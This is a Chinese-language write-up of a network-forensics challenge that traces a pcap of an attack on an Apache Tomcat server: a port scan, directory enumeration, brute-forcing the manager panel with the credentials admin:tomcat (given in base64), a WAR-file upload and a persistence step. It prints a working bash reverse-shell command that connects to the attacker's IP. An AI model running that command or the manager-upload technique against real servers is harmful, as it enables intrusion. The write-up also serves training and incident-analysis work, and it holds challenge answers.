題干：

我們的 SOC 團隊在公司內(nèi)部網(wǎng)的一臺 Web 服務(wù)器上檢測到可疑活動。為了更深入地了解情況，團隊捕獲了網(wǎng)絡(luò)流量進行分析。此 pcap 文件可能包含一系列惡意活動，這些活動已導(dǎo)致 Apache Tomcat Web 服務(wù)器遭到破壞。我們需要進一步調(diào)查這一事件。

鑒于在 Web 服務(wù)器上檢測到的可疑活動，pcap數(shù)據(jù)包顯示服務(wù)存在跨端口請求，這表明存在潛在的掃描行為。您能否確定在我們的服務(wù)器上發(fā)起這些請求的源 IP 地址？

使用wireshark工具直接打開下載好的pcap數(shù)據(jù)包，然后根據(jù)端口大小進行排序，我們發(fā)現(xiàn)14.0.0.120 對 10.0.0.112 設(shè)備從23端口開始進行遞歸探測

所以此題的答案為14.0.0.120

根據(jù)與攻擊者關(guān)聯(lián)的已識別 IP 地址，您能否確定攻擊者活動起源于哪個城市？

因為這個題目是歪果仁出的，所以不建議使用國內(nèi)的ip地址查詢，使用國外的，否則答案就是錯的

Pcap數(shù)據(jù)包中的端口中的哪一個提供對 Web 服務(wù)器管理面板的訪問？

很顯然，真相只有一個，那就是8080

攻擊者在我們的服務(wù)器上發(fā)現(xiàn)開放端口后，似乎試圖枚舉我們 Web 服務(wù)器上的目錄和文件。您可以從分析中識別出攻擊者使用的工具是什么嗎？

竟然是枚舉目錄，那我們直接找404

隨便選一個，進行http追蹤

特征已經(jīng)很明顯了，雖然不知道這個工具是啥，但是確定就是他了

在他們枚舉 Web 服務(wù)器上的目錄之后，攻擊者發(fā)出了大量請求，試圖識別管理界面。攻擊者發(fā)現(xiàn)了與管理面板關(guān)聯(lián)的哪個特定目錄？

這道題其實承上啟下，人家問的是與管理面板關(guān)聯(lián)的目錄，所以我們不能光看200請求碼，還需要看有登錄標(biāo)識的

很顯然，是manager

訪問管理面板后，攻擊者試圖暴力破解登錄憑據(jù)。從數(shù)據(jù)中，您能否識別出攻擊者成功用于授權(quán)的正確用戶名和密碼組合？

直接找到最后一個401的下一個數(shù)據(jù)包就行

追蹤流

YWRtaW46dG9tY2F0
使用葵爺進行base64解碼

進入管理面板，攻擊者試圖上傳文件，意圖建立反向 shell。您能從捕獲的數(shù)據(jù)中識別出此惡意文件的名稱嗎？

直接找上傳數(shù)據(jù)包

追蹤流

好好好，war包上傳getshell是吧
JXQOZY.war

在我們的服務(wù)器上成功建立反向 shell 后，攻擊者旨在確保受感染機器上的持久性。從分析中，您能否確定它們計劃運行的特定命令是什么嗎？

這里就不能追蹤http請求了，我們需要回到最初始的狀態(tài)，直接找getshell成功后，第一次訪問這個shell的后面的數(shù)據(jù)包

為啥看這個呢，因為8080war包上傳后最后通過shell控制的當(dāng)然還是80端口

結(jié)果顯而易見
/bin/bash -c ‘bash -i >& /dev/tcp/14.0.0.120/443 0>&1’

so easy